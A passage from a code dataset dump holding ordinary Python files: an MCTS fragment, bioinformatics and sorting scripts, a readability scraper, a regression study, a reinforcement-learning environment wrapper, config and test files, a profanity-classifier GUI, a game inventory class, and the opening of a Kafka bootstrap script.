child_node.parent\n actions = parent_node.untried_actions\n wins = rollout(board, board.next_state(state, actions[0])) \n\n temp = child_node\n temp.visits += 1\n temp.wins += wins\n while temp.parent !=None:\n temp = temp.parent\n temp.visits += 1\n temp.wins += wins\n root_node = temp\n #print(currenttime)\n high=-1\n #print(\"test2\")\n for node in root_node.child_nodes:\n temp2=root_node.child_nodes[node]\n if ((temp2.wins/temp2.visits)>high) and node!=None:\n score=(temp2.wins/temp2.visits)\n best=node\n\n return 
best","sub_path":"pa3/mcts_modified.py","file_name":"mcts_modified.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"145910491","text":"import acm\nael_variables = [\n['vertical_shift', 'Vertical Shift (%)', 'double', None, None, 1, 0, '', None, True],\n['tilt', 'Tilt (%)', 'double', None, None, 1, 0, '', None, True]\n]\n\ndef ael_main_ex( parameters, dictExtra ):\n params = acm.FNamedParameters()\n name = str('')\n vertical = parameters['vertical_shift']\n tilt = parameters['tilt']\n if (vertical != 0.0):\n name = name + str(vertical) + '% vertical'\n if (tilt != 0.0):\n name = name + str(' & ') + str(tilt) + '% tilt'\n elif (tilt != 0.0):\n name = name + str(tilt) + '% tilt'\n params.Name(name)\n params.AddParameter( 'vertical_shift', parameters['vertical_shift'] )\n params.AddParameter( 'tilt', parameters['tilt'] )\n vec = acm.FArray()\n vec.Add( params )\n return vec\n","sub_path":"Extensions/Default/FPythonCode/baseCorrelationScenarioGetParams.py","file_name":"baseCorrelationScenarioGetParams.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"157909712","text":"from Bio import SeqIO\nfrom Bio.SeqUtils import GC\n\nfile = str(input(\"File: \"))\nreads = list(SeqIO.parse(file, \"fasta\"))\n\nif len(reads[0].seq)%3 == 1:\n\treads[0].seq += 'NN'\nelif len(reads[0].seq)%3 == 2:\n\treads[0].seq += 'N'\n\nrf1 = reads[0].seq\nrf2 = reads[0].seq[1:len(reads[0].seq)-2]\nrf3 = reads[0].seq[2:len(reads[0].seq)-1]\n#rf4 = reads[0].seq.reverse_complement()\n#rf5 = reads[0].seq[2:len(reads[0].seq)-1].reverse_complement()\n#rf6 = reads[0].seq[1:len(reads[0].seq)-2].reverse_complement()\n\nseqs1 = rf1.translate()\nseqs2 = rf2.translate()\nseqs3 = rf3.translate()\n#seqs4 = rf4.translate()\n#seqs5 = rf5.translate()\n#seqs6 = rf6.translate()\n\nlstart1 = []\nlstart2 = []\nlstart3 = []\n#lstart4 = []\n#lstart5 = []\n#lstart6 = []\nc1 = 0\nc2 = 0\nc3 = 0\n#c4 = 0\n#c5 = 0\n#c6 = 0\nn1 = 0\nn2 = 0\nn3 = 0\n#n4 = 0\n#n5 = 0\n#n6 = 0\n\ndef locs(x, lstart, c):\n\tplength = 0\n\tstartstop = {}\n\tfor i in range(0, len(x)):\n\t\tif plength == 0:\n\t\t\tstart = int(i)\n\t\tif x[i] != '*':\n\t\t\tplength += 1\n\t\telif x[i] == '*':\n\t\t\tif plength > 100:\n\t\t\t\tlstart.append(start)\n\t\t\t\tstartstop[lstart[c]] = int(i)\n\t\t\t\tc += 1\n\t\t\tplength = 0\n\treturn startstop\n\ndef prot(x, lstart, n):\n\tsequences = {}\n\tproteins = x.split('*')\n\tfor i in range(0, len(proteins)):\n\t\tif len(proteins[i]) > 100:\n\t\t\tsequences[lstart[n]] = ''.join(proteins[i])\n\t\t\tn += 1\n\treturn sequences\n\nlocations1 = locs(seqs1, lstart1, c1)\nproteins1 = prot(seqs1, lstart1, n1)\n\nlocations2 = locs(seqs2, lstart2, c2)\nproteins2 = prot(seqs2, lstart2, n2)\n\nlocations3 = locs(seqs3, lstart3, c3)\nproteins3 = prot(seqs3, lstart3, n3)\n\n#locations4 = locs(seqs4, lstart4, c4)\n#proteins4 = prot(seqs4, lstart4, n4)\n\n#locations5 = locs(seqs5, lstart5, c5)\n#proteins5 = prot(seqs5, lstart5, n5)\n\n#locations6 = locs(seqs6, lstart6, c6)\n#proteins6 = prot(seqs6, lstart6, n6)\n\nprint()\nprint('In reading frame 1:')\nprint(f'The proteins longer than 100 amino acids are: {proteins1}')\nprint(f'The endpoints of the proteins are: {locations1}')\nprint()\nprint('Reading frame 2 is adjusted by +1. 
In reading frame 2:')\nprint(f'The proteins longer than 100 amino acids are: {proteins2}')\nprint(f'The endpoints of the proteins are: {locations2}')\nprint()\nprint('Reading frame 3 is adjusted by +2. In reading frame 3:')\nprint(f'The proteins longer than 100 amino acids are: {proteins3}')\nprint(f'The endpoints of the proteins are: {locations3}')\nprint()\n#print('Reading frame 4 is the reverse complement of reading frame 1. In reading frame 4:')\n#print(f'The proteins longer than 100 amino acids are: {proteins4}')\n#print(f'The endpoints of the proteins are: {locations4}')\n#print()\n#print('Reading frame 5 is the reverse complement of reading frame 1 adjusted by +1. In reading frame 5:')\n#print(f'The proteins longer than 100 amino acids are: {proteins5}')\n#print(f'The endpoints of the proteins are: {locations5}')\n#print()\n#print('Reading frame 6 is the reverse complement of reading frame 1 adjusted by +2. In reading frame 6:')\n#print(f'The proteins longer than 100 amino acids are: {proteins6}')\n#print(f'The endpoints of the proteins are: {locations6}')\n#print()\n","sub_path":"rvokkarne/bio-translation.py","file_name":"bio-translation.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529569228","text":"def find_min(number_list):\n    lowest_num = number_list[0]\n    for num in number_list:\n        if num < lowest_num:\n            lowest_num = num\n    return lowest_num\n\ndef tally_sort(num_list):\n    min_num = find_min(num_list)\n    ind_list = []\n    sorted_list = []\n    filler_list = []\n    for num in range(len(num_list)):\n        num_list[num]-=min_num\n        ind_list.append(0)\n    print(num_list)\n    print(ind_list)\n    for ind in range(len(ind_list)):\n        for num in range(len(num_list)):\n            if ind == num_list[num]:\n                ind_list[ind]+=1\n    for tallies in range(len(ind_list)):\n        if ind_list[tallies] > 0:\n            for num in range(ind_list[tallies]):\n                sorted_list.append(ind_list.index(ind_list[tallies]))\n\n\n\n    \n    \n    print(num_list)\n    print(ind_list)\n    print(sorted_list)\n    \n    \n    \ntally_sort([2, 5, 2, 3, 8, 6, 3])\n","sub_path":"tally_sort.py","file_name":"tally_sort.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"109781141","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Рузэль Давлетяров (ruzelapp@yandex.ru)\"\n\nimport os\nimport sys\nimport textwrap\nimport configparser\nfrom urllib.request import urlopen\nfrom urllib.parse import urlparse\n\n# Third-party module - pip install beautifulsoup4\nfrom bs4 import BeautifulSoup\n\n\nif __name__ == '__main__':\n\n    url = str(sys.argv[1])\n    urlpars = urlparse(url)\n    domain = urlpars.netloc\n    config = configparser.ConfigParser()\n    config.read('config.ini','utf8')\n\n    # Determine the output path\n    directoryname = os.getcwd() #If this code is run from another directory, the result will end up here\n    headpath = os.path.join(directoryname,str(urlpars.netloc)) \n    tailpath = urlpars.path.replace('/',os.sep) \n    path = headpath + tailpath\n\n    # Create the directories\n    try:\n        os.makedirs(path) \n    except FileExistsError: #Suppress the exception, since some directories may have been created by a previous 
run\n        pass\n\n    #Dealing with encodings \n    try:\n        data = urlopen(url).read().decode('utf8') \n    except UnicodeDecodeError:\n        try:\n            data = urlopen(url).read().decode('cp1251')\n        except UnicodeDecodeError:\n            data = urlopen(url).read().decode('utf-8','ignore')\n    \n    #html.parser - the standard parser from the Python stdlib\n    soup = BeautifulSoup(data, \"html.parser\")\n    \n    #Write out the page title\n    source = \"\\n\".join(textwrap.wrap(soup.h1.string, width=80, replace_whitespace=False)) + \"\\n\\n\" \n    \n    #Iterate over all paragraphs\n    for i in soup.find_all('p'):\n        if domain in config: #If a template is defined in config.ini\n            confset = set(config[domain]['class'].split(','))\n            for paren in i.parents:\n                if paren.attrs.get('class') != None:\n                    parentset = set(paren.attrs.get('class'))\n                    if not parentset.issubset(confset): #If all classes from the attribute are present in the template\n                        lcl_data = i.get_text()\n                        for link in i.children:\n                            if link.name == \"a\": #Handle links here\n                                lcl_data = lcl_data.replace(link.text, link.text + ' [' + link['href'] + ']')\n                        source += \"\\n\".join(textwrap.wrap(lcl_data, width=80, replace_whitespace=False)) + '\\n\\n'\n                    break \n        else:\n            lcl_data = i.get_text()\n            for link in i.children:\n                if link.name == \"a\":\n                    lcl_data = lcl_data.replace(link.text, link.text + ' [' + link['href'] + ']') \n\n            source += \"\\n\".join(textwrap.wrap(lcl_data, width=80, replace_whitespace=False)) + '\\n\\n'\n    \n\n    # Write out the result\n    f1 = open(os.path.join(path,'index.txt'), 'w+', encoding=\"utf8\")\n    f1.write(source)\n    f1.close() \n    \n","sub_path":"appreadability.py","file_name":"appreadability.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90603056","text":"# Jianzhi Offer 14-II. 
Cut the Rope II\r\n# You are given a rope of length n. Cut it into m segments of integer length (m and n are integers, n > 1 and m > 1); denote the segment lengths k[0],k[1]...k[m - 1].\r\n# What is the maximum possible product k[0]*k[1]*...*k[m - 1]? For example, when the rope length is 8, cutting it into three segments of lengths 2, 3 and 3 yields the maximum product 18.\r\n# The answer must be taken modulo 1e9+7 (1000000007); e.g. if the raw result is 1000000008, return 1.\r\nclass Solution:\r\n    # 5.01 21.45\r\n    def cuttingRope(self, n: int) -> int:\r\n        # dp[i] is the maximum product obtainable for a rope of length i\r\n        dp = [0 for _ in range(n + 1)]\r\n        for i in range(2, n + 1):\r\n            for j in range(1, i):\r\n                dp[i] = max(dp[i], max(j * (i - j), j * dp[i - j]))\r\n        return dp[n] % (1000000007)\r\n\r\n    # Elegant solution\r\n    def cuttingRope(self, n: int) -> int:\r\n        sm = [0, 1, 1, 2, 4]\r\n        if n <= 4:\r\n            return sm[n]\r\n        a = n // 3\r\n        b = n % 3\r\n        if b == 0:\r\n            return 3 ** a % 1000000007\r\n        else:\r\n            return 3 ** (a + b - 2) * (6 - 2 * b) % 1000000007\r\n\r\n    # Elegant solution\r\n    def cuttingRope(self, n: int) -> int:\r\n\r\n        if n <= 3: return n - 1\r\n\r\n        res = 1\r\n\r\n        while n > 4:\r\n            n = n - 3\r\n            res = res * 3 % 1000000007\r\n\r\n        return res * n % 1000000007","sub_path":"pySrc/CutTheRope2.py","file_name":"CutTheRope2.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"62974214","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 23 10:12:49 2017\n\n@author: Harshvardhan Gazula\n@notes : Contains a variant of the single-shot regression proposed by Eswar.\n         Drop site specific columns at each site and use global_beta_vector\n         to calculate SSE at each local site.\n@modified: 01/14/2018 weighted average single shot regression\n\"\"\"\n\nimport os\nimport shelve\nimport numpy as np\nfrom numba import jit, prange\nimport pandas as pd\nimport scipy as sp\nfrom mcic_load_data import load_data\n\n@jit(nopython=True)\ndef singleshot_regression(X1, site_01_y1, X2, site_02_y1, X3, site_03_y1, X4,\n                          site_04_y1):\n\n    size_y = site_01_y1.shape[1]\n\n    params = np.zeros((X1.shape[1], size_y))\n    sse = np.zeros(size_y)\n    tvalues = np.zeros((X1.shape[1], size_y))\n    rsquared = np.zeros(size_y)\n\n    for voxel in prange(size_y):\n        print(voxel)\n\n        y1 = site_01_y1[:, voxel]\n        y2 = site_02_y1[:, voxel]\n        y3 = site_03_y1[:, voxel]\n        y4 = site_04_y1[:, voxel]\n\n        # Start of single shot regression\n        beta1 = np.linalg.inv(X1.T @ X1) @ (X1.T @ y1)\n        beta2 = np.linalg.inv(X2.T @ X2) @ (X2.T @ y2)\n        beta3 = np.linalg.inv(X3.T @ X3) @ (X3.T @ y3)\n        beta4 = np.linalg.inv(X4.T @ X4) @ (X4.T @ y4)\n\n        # PART 02 - Aggregating parameter values at the remote\n        count_y_local = np.array([len(y1), len(y2), len(y3), len(y4)])\n\n        # Weighted Average\n        count_y_local_float = count_y_local.astype(np.float64)\n        sum_params = np.column_stack((beta1, beta2, beta3, beta4))\n        avg_beta_vector = sum_params @ count_y_local_float / np.sum(count_y_local)\n\n# =============================================================================\n#         # Simple Average\n#         avg_beta_vector = (beta1 + beta2 + beta3 + beta4) / 4\n# =============================================================================\n\n        params[:, voxel]= avg_beta_vector\n\n        # PART 03 - SSE at each local site\n        y1_estimate = np.dot(avg_beta_vector, X1.T)\n        y2_estimate = np.dot(avg_beta_vector, X2.T)\n        y3_estimate = np.dot(avg_beta_vector, X3.T)\n        y4_estimate = np.dot(avg_beta_vector, X4.T)\n\n        sse1 = np.linalg.norm(y1 - y1_estimate)**2\n        sse2 = np.linalg.norm(y2 - y2_estimate)**2\n        sse3 = np.linalg.norm(y3 - y3_estimate)**2\n        sse4 = np.linalg.norm(y4 - y4_estimate)**2\n\n        # At Local\n        mean_y_local = np.array([np.mean(y1), np.mean(y2), np.mean(y3), 
np.mean(y4)])\n\n # At Remote\n mean_y_global = np.sum(\n mean_y_local * count_y_local) / np.sum(count_y_local)\n\n # At Local\n sst1 = np.sum(np.square(y1 - mean_y_global))\n sst2 = np.sum(np.square(y2 - mean_y_global))\n sst3 = np.sum(np.square(y3 - mean_y_global))\n sst4 = np.sum(np.square(y4 - mean_y_global))\n\n cov1 = X1.T @ X1\n cov2 = X2.T @ X2\n cov3 = X3.T @ X3\n cov4 = X4.T @ X4\n\n # PART 05 - Finding rsquared (global)\n SSE_global = sse1 + sse2 + sse3 + sse4\n sse[voxel] = SSE_global\n SST_global = sst1 + sst2 + sst3 + sst4\n r_squared_global = 1 - (SSE_global / SST_global)\n rsquared[voxel] = r_squared_global\n\n # PART 04 - Finding p-value at the Remote\n varX_matrix_global = cov1 + cov2 + cov3 + cov4\n\n dof_global = np.sum(count_y_local) - len(avg_beta_vector)\n\n MSE = SSE_global / dof_global\n var_covar_beta_global = MSE * np.linalg.inv(varX_matrix_global)\n se_beta_global = np.sqrt(np.diag(var_covar_beta_global))\n ts_global = avg_beta_vector / se_beta_global\n\n tvalues[:, voxel] = ts_global\n\n return (params, sse, tvalues, rsquared, dof_global)\n\n\nfolder_index = input('Enter the name of the folder to save results: ')\nfolder_name = folder_index.replace(' ', '_')\nif not os.path.exists(folder_name):\n os.makedirs(folder_name)\n\nX1, site_01_y1, X2, site_02_y1, X3, site_03_y1, X4, site_04_y1, column_name_list = load_data(\n)\n\n(params, sse, tvalues, rsquared, dof_global) = singleshot_regression(\n X1, site_01_y1, X2, site_02_y1, X3, site_03_y1, X4, site_04_y1)\n\n\nps_global = 2 * sp.stats.t.sf(np.abs(tvalues), dof_global)\npvalues = pd.DataFrame(ps_global.transpose(), columns=column_name_list)\nsse = pd.DataFrame(sse.transpose(), columns=['sse'])\nparams = pd.DataFrame(params.transpose(), columns=column_name_list)\ntvalues = pd.DataFrame(tvalues.transpose(), columns=column_name_list)\nrsquared = pd.DataFrame(rsquared.transpose(), columns=['rsquared_adj'])\n\n# %% Writing to a file\nprint('Writing data to a shelve file')\nresults = shelve.open(os.path.join(folder_name, 'singleshotWA_results'))\nresults['params'] = params\nresults['sse'] = sse\nresults['pvalues'] = pvalues\nresults['tvalues'] = tvalues\nresults['rsquared'] = rsquared\nresults.close()\n","sub_path":"mcic_regression_singleshot.py","file_name":"mcic_regression_singleshot.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"335985491","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.8-x86_64/egg/vint/file_util.py\n# Compiled at: 2013-04-19 06:08:22\nfrom __future__ import unicode_literals\nimport json, logging, os, codecs\n__author__ = b'tchen'\nlogger = logging.getLogger(__name__)\nFIRST_EXTENSIONS = [\n b'.h']\nINSTRUCTION_FILE = b'README'\nEXAM_CONFIG_FILE = b'.interview.json'\nCASE_CONFIG_FILE = b'.case.json'\nEXAM_INSTRUCTION_TEMPLATE = b'\\nHello %(applicant)s, Welcome to exam %(name)s\\n\\n%(description)s\\n\\nInstructions:\\n\\n1. Write the code as fast as you can. Optimize when you have further time.\\n2. Verify the correctness and robustness of your code with proper output.\\n3. 
When you finish the exam, please go back to this directory (where you see this file), and execute \"vint finish\".\n   This is very important, since we will time your exam and submit your result back to the hiring manager.\n\nStart your journey now, pal!\n\n'\nCASE_INSTRUCTION_TEMPLATE = b\"\\n\\nCase%(position)d: %(name)s\\n\\n%(description)s\\n\\nInstructions:\\n\\n1. You need to code in %(lang)s, with acceptable extensions: %(extentions)s.\\n2. You'd better write the code in a single file unless it becomes unreadable.\\n\"\n\ndef write_file(filename, content):\n    f = codecs.open(filename, b'w+', encoding=b'utf8')\n    f.write(content)\n    f.close()\n\n\nclass Template(object):\n\n    @staticmethod\n    def create_exam_config(exam_path, interview):\n        filename = os.path.join(os.getcwd(), exam_path, EXAM_CONFIG_FILE)\n        content = json.dumps(interview)\n        write_file(filename, content)\n\n    @staticmethod\n    def create_exam_instruction(exam_path, interview, exam):\n        filename = os.path.join(os.getcwd(), exam_path, INSTRUCTION_FILE)\n        content = EXAM_INSTRUCTION_TEMPLATE % {b'applicant': interview[b'applicant'], \n           b'name': exam[b'name'], \n           b'description': exam[b'description']}\n        write_file(filename, content)\n\n    @staticmethod\n    def create_case_config(case_path, case):\n        filename = os.path.join(case_path, CASE_CONFIG_FILE)\n        content = json.dumps(case)\n        write_file(filename, content)\n\n    @staticmethod\n    def create_case_instruction(case_path, case):\n        instruction = os.path.join(case_path, INSTRUCTION_FILE)\n        content = CASE_INSTRUCTION_TEMPLATE % {b'position': case[b'position'], \n           b'name': case[b'name'], \n           b'description': case[b'description'], \n           b'lang': case[b'lang'], \n           b'extentions': case[b'extentions']}\n        write_file(instruction, content)\n\n    @staticmethod\n    def create_case_code(case_path, case):\n        ext = case[b'extentions'].split(b',')[0].strip()\n        filename = os.path.join(case_path, b'main%s' % ext)\n        write_file(filename, case[b'code'])\n\n\nclass FileUtil(object):\n\n    @staticmethod\n    def read_content(filename):\n        return codecs.open(filename, b'r', encoding=b'utf8').read()\n\n    @staticmethod\n    def get_valid_files(path, extentions):\n        first_list = []\n        second_list = []\n        normal_list = []\n        for root, dirs, files in os.walk(path):\n            for f in files:\n                for ext in extentions:\n                    if f.endswith(ext):\n                        normal_list.append(f)\n                        break\n\n        for f in normal_list:\n            for ext in FIRST_EXTENSIONS:\n                if f.endswith(ext):\n                    first_list.append(f)\n                    break\n            else:\n                second_list.append(f)\n\n        return (\n         first_list, second_list)\n\n    @staticmethod\n    def read_case(path):\n        return FileUtil.read_json(path, CASE_CONFIG_FILE)\n\n    @staticmethod\n    def read_json(path, name):\n        filename = os.path.join(path, name)\n        return json.load(codecs.open(filename, b'r', encoding=b'utf8'))\n\n    @staticmethod\n    def read_interview(path):\n        return FileUtil.read_json(path, EXAM_CONFIG_FILE)\n\n    @staticmethod\n    def interview_exists():\n        return os.path.exists(EXAM_CONFIG_FILE)","sub_path":"pycfiles/vint-0.1.5-py2.7/file_util.py","file_name":"file_util.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486263412","text":"from dam import Dam\n\nimport math\nimport numpy as np\nfrom numpy.linalg import norm\nfrom gym.envs.registration import register\n\n#Radial Basis Function\ndef rbf(c,w,s):\n    return math.exp(-norm(s-c)/w)\n\ndef spaceout(n,lo,hi):\n    step = (hi - lo)/(n+1)\n    return [lo+k*step for k in range(1,n+1)]\n    \nregister(\n    
id='DamWrap-v0',\n entry_point='dam_wrap:DamWrap',\n)\n\n#Wrapper for Dam environment\nclass DamWrap(Dam):\n def __init__(self,dreward=2,penalize=False):\n self.centers = spaceout(2,-20,190)\n self.dim = len(self.centers)+1\n self.width = 60 \n \n super(DamWrap,self).__init__()\n \n self.obj_weights = [0.5,0.5]\n assert len(self.obj_weights)==dreward\n assert sum(self.obj_weights)==1\n\n def features(self,s):\n features = [1]\n for c in self.centers:\n features.append(rbf(c,self.width,s))\n return features\n\n def step(self,action,noise,render=False):\n s,r,done,info = super(DamWrap,self).step(action,render,noise)\n \n #Model state: RBFs\n new_s = self.features(s) \n\n #Model reward: convex combination\n new_r = np.dot(self.obj_weights,r)\n\n return np.array(new_s),new_r,done,info\n\n def reset(self,state=None,scalar=False):\n super(DamWrap,self).reset(state)\n if not scalar:\n return np.array(self.features(self.get_state()))\n else:\n return self.get_state()\n","sub_path":"dam/dam_wrap.py","file_name":"dam_wrap.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"249629905","text":"\"\"\"\nSettings for maintaining and running an AWS Lambda function.\n\nauthor: Shang-Lin Chen\n\n\"\"\"\n\nAWS_PROFILE = 'default' # Profile in .aws/credentials\n # that has S3 and Lambda permissions.\n\nAWS_REGION = 'us-west-2' # AWS region where the lambda function\n # is deployed. Should be the same\n # region as all S3 buckets.\n\n# AWS IAM role that has Lambda and S3 permissions.\nIAM_ROLE = 'put_iam_role_here'\n\nLAMBDA_FUNCTION = 'DecimationFunc' # Name of your lambda function.\n\nLAMBDA_BUCKET = 'lambda-venv-bucket' # Name of the S3 bucket that will \n # store a zip file containing \n # the lambda function and environment.\n\n# Description of what your lambda function does.\n# This is one of the settings sent to AWS.\nLAMBDA_DESCRIPTION = 'Testing Lambda with ObsPy!'\n\nINPUT_BUCKET = 'scedc-pds' # S3 bucket used as s3_input_bucket.\n # This does not need to be modified\n # if using the SCEDC Public Data Set.\n\nOUTPUT_BUCKET = 'output-bucket' # Name of the S3 bucket where Lambda\n # output will be written.\n\nNCORES = 4 # Number of cores to use for calling Lambda function.\n\n","sub_path":"pds-lambda-example/settings_example.py","file_name":"settings_example.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426761252","text":"# -*- coding: utf-8 -*-\n\nfrom itertools import chain, product\n\nfrom nose.tools import raises\n\nimport friendlysam as fs\nfrom friendlysam import Storage, FlowNetwork\n\nfrom friendlysam.tests.simple_models import Producer, Consumer, RESOURCE\nfrom friendlysam.tests import default_solver, approx\nfrom friendlysam import Problem, Minimize, Sum\n\ndef test_basic_functionality():\n times = range(1,4)\n\n consumption = lambda t: t * 1.5\n V0 = 10\n\n p = Producer(name='Producer')\n c = Consumer(consumption, name='Consumer')\n s = Storage(RESOURCE, capacity=15, name='Storage')\n s.volume(0).value = V0\n rn = FlowNetwork(RESOURCE)\n rn.connect(p, s)\n rn.connect(s, c)\n\n prob = Problem()\n prob += (part.constraints.make(t) for part, t in product(rn.descendants_and_self, times))\n\n prob.objective = Minimize(Sum(p.cost(t) for t in times))\n\n solution = default_solver.solve(prob)\n\n for t in times:\n c.activity(t).take_value(solution)\n p.activity(t).take_value(solution)\n 
s.volume(t).take_value(solution)\n\n for t in times:\n assert approx(p.activity(t).value, 0)\n assert approx(c.consumption[RESOURCE](t).value, consumption(t))\n assert approx(s.volume(t).value, s.volume(t-1).value + s.accumulation[RESOURCE](t-1).value)\n","sub_path":"friendlysam/tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"341455015","text":"\"\"\"\nClassify sentences using trained LinearSVC\n\"\"\"\n\nimport tkinter as tk\nimport pkg_resources\nimport joblib\n\nvectorizer = joblib.load(pkg_resources.resource_filename('Project', 'LinearSVC Approach/vectorizer.joblib'))\nmodel = joblib.load(pkg_resources.resource_filename('Project', 'LinearSVC Approach/model.joblib'))\n\ntext_color = 'black'\n\n\ndef classify_text():\n \"\"\"Classify a text as profane or not-profane\n \"\"\"\n word = ent_word.get(\"1.0\", tk.END)\n result = model.predict(vectorizer.transform([word]))\n if result[0] == 0:\n lbl_classification[\"text\"] = 'Result : Not profane.'\n else:\n lbl_classification[\"text\"] = 'Result : Profane.'\n\n\nwindow = tk.Tk()\nwindow.title(\"Word Classifier\")\n\n\ndef handle_keypress(event):\n \"\"\"Reset classification.\"\"\"\n # print(event.char)\n lbl_classification[\"text\"] = ''\n\n\n# Bind keypress event to handle_keypress()\nwindow.bind(\"\", handle_keypress)\n\nfrm_entry = tk.Frame(master=window)\nlbl_instruction = tk.Label(master=frm_entry, text=\"Enter the sentence to classify :\")\nlbl_instruction.config(font=(\"Courier\", 20))\nent_word = tk.Text(master=frm_entry, width=100, height=5)\nlbl_instruction.grid(row=0, column=0, sticky=\"we\")\nent_word.grid(row=1, column=0, sticky=\"we\")\nbtn_convert = tk.Button(\n master=window,\n text=\"Classify \\N{RIGHTWARDS BLACK ARROW}\",\n command=classify_text\n)\nlbl_classification = tk.Label(master=window, text=\"\", fg=text_color)\nlbl_classification.config(font=(\"Courier\", 40))\nfrm_entry.grid(row=0, column=0, padx=10)\nbtn_convert.grid(row=1, column=0, padx=10, pady=10, sticky=\"w\")\nlbl_classification.grid(row=1, column=0, padx=10, sticky=\"e\")\n\nwindow.mainloop()\n","sub_path":"Gui/classify_sentence.py","file_name":"classify_sentence.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"379920576","text":"from gui.messages import Message\n\n\nclass Inventory:\n def __init__(self, capacity=26, items=None):\n self.owner = None\n if items is None:\n items = []\n self.capacity = capacity\n self.items = items\n\n def add_to_inv(self, item):\n if len(self.items) + 1 <= self.capacity:\n self.items.append(item)\n return True\n else:\n return False\n\n def remove_from_inv(self, item):\n \"\"\" removes an item from the player main inventory or any quick use slots \"\"\"\n if item in (self.items):\n self.items.remove(item)\n else:\n # check all quick use slots if the item wasn't found\n for e in self.owner.paperdoll.equipped_items:\n if getattr(e, 'slots',0):\n if item in e.qu_inventory.items:\n e.qu_inventory.items.remove(item)\n\n def is_full(self):\n return True if len(self.items) == self.capacity else False\n\nclass QuickUseInv(Inventory):\n def __init__(self, capacity =6, attached_to=None):\n super().__init__(capacity=capacity)\n\n self.attached_to = attached_to\n\n def add_to_qu(self, item):\n owner = self.attached_to.owner\n if owner:\n # # get the index of the first slot returning None\n 
# #try:\n            # #idx = next(idx for idx, v in enumerate(self.items) if v is None)\n            # # if that fails (all slots taken) return false\n            # except:\n            #     return False\n            #if owner.inventory.add_to_inv(item):\n            #else:\n            # if item is added to the qu inventory, remove it from the owner inventory\n            if self.add_to_inv(item):\n                #self.items[idx] = item\n                owner.inventory.remove_from_inv(item)\n                return True\n            else:\n                return False\n\n\n    def remove_from_qu(self, item):\n        owner = self.attached_to.owner\n        if owner:\n            if owner.inventory.add_to_inv(item):\n                self.items[self.items.index(item)] = None\n                return True\n            else:\n                return False\n\n    def empty_to_inv(self):\n        owner = self.attached_to.owner\n        for i in self.items:\n            #if i is not None:\n            if owner.inventory.add_to_inv(i):\n                Message('You move the {0} from your {1} to your backpack.'.format(i.name, self.attached_to))\n            else:\n                Message('As your backpack is full, you had to drop the {0} on the ground.'.format(i.name, self.attached_to))\n                i.drop()\n\n        # empty the inventory of removed quick-use equipment\n        self.items = []\n        # for i in range(self.capacity):\n        #     self.items[i] = None\n\n    def swap_qu_inv(self, other_inv):\n        \"\"\" swaps the contents of two quick_use inventories \"\"\"\n        for i in self.items:\n            if len(other_inv.items) + 1 <= other_inv.capacity:\n                other_inv.items.append(i)\n                Message('You move the {0} to your new {1}.'.format(i.name, other_inv.attached_to))\n\n        # any items still stored are dumped to the inventory\n        if len(self.items):\n            self.empty_to_inv()\n","sub_path":"components/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"391183474","text":"#!/usr/bin/env python\n\"\"\" Kafka Bootstrap Script (based on Kafka 1.0.0 release) \"\"\"\nimport datetime\nimport logging\nimport os\nimport shutil\nimport signal\nimport socket\nimport sys\nimport time\nimport urllib.error\nimport urllib.request\nimport uuid\nfrom optparse import OptionParser\n\nimport hostlist\nimport pkg_resources\nfrom pykafka import KafkaClient\n\nfrom pilot.util.ssh_utils import execute_ssh_command, execute_ssh_command_as_daemon\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# For automatic Download and Installation\n# VERSION=\"0.10.1.0\"\nVERSION = \"2.8.1\" \n# KAFKA_DOWNLOAD_URL = \"http://www-us.apache.org/dist/kafka/\" + VERSION + \"/kafka_2.11-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"http://apache.mirrors.lucidnetworks.net/kafka/\"+ VERSION + \"/kafka_2.11-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"http://mirrors.gigenet.com/apache/kafka/\"+ VERSION + \"/kafka_2.11-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"http://mirrors.gigenet.com/apache/kafka/\" + VERSION + \"/kafka_2.13-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"https://downloads.apache.org/kafka/\" + VERSION + \"/kafka_2.13-\" + VERSION + \".tgz\"\n\nKAFKA_DOWNLOAD_URL = 